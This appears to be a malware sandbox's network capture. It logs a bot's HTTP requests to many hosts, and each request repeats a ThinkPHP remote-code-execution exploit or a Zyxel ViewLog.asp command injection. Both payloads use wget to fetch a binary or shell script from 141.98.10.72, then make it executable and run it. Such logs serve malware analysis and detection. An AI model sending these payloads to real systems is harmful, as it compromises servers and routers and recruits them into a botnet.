                                                        Feb 14, 2024 09:33:40.281277895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.498276949 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 38 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 32 30 26 23 34 36 3b 31 64 36 65 38 62 37 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;480b1502&#46;1707899620&#46;1d6e8b7c</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        369192.168.2.144938495.110.166.8880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.283662081 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.503710985 CET450INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:21 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.17
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        370192.168.2.144746295.101.90.1380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.285233974 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.505984068 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 32 31 64 64 35 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 36 32 30 26 23 34 36 3b 32 39 38 31 38 64 39 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;121dd517&#46;1707899620&#46;29818d92</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        371192.168.2.145316295.216.20.3980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.289170980 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.513668060 CET543INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
                                                        Content-Length: 325
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 74 20 50 48 50 2f 38 2e 32 2e 34 20 53 65 72 76 65 72 20 61 74 20 6b 75 75 74 69 6f 2e 74 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 Server at kuutio.tk Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        372192.168.2.145938095.216.8.10380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.290967941 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.517374039 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        373192.168.2.145118095.211.22.14180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:40.464627028 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:40.669142962 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:40 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        374192.168.2.145769485.120.56.88080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.088309050 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:43.272089005 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:43.499041080 CET59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        375192.168.2.144214094.121.142.1778080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.101008892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        376192.168.2.144811494.121.208.318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.101068974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        377192.168.2.145458695.67.98.28080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.325171947 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:43.559469938 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:44.999584913 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:48.007522106 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        378192.168.2.145456494.123.252.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.348898888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        379192.168.2.145781662.29.46.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.349559069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        380192.168.2.146044495.210.128.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.519421101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        381192.168.2.145666662.4.11.1168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.519670963 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:42.714432001 CET1286INHTTP/1.1 400 Bad Request
                                                        Server: squid/4.15
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:33:42 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3615
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from prod04.proxy.cdg.witopia.net
                                                        X-Cache-Lookup: NONE from prod04.proxy.cdg.witopia.net:443
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {


                                                        Session IDSource IPSource PortDestination IPDestination Port
